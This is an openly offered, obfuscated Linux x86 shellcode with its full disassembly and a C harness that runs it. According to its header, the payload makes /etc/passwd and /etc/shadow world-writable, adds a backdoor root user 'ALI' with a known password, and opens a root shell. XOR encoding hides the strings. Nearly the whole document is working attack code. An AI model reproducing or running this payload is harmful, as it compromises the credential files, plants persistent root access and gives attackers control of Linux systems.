/*
Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
length: 521 bytes
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
root@user:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@user:~/Desktop/xpl#
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}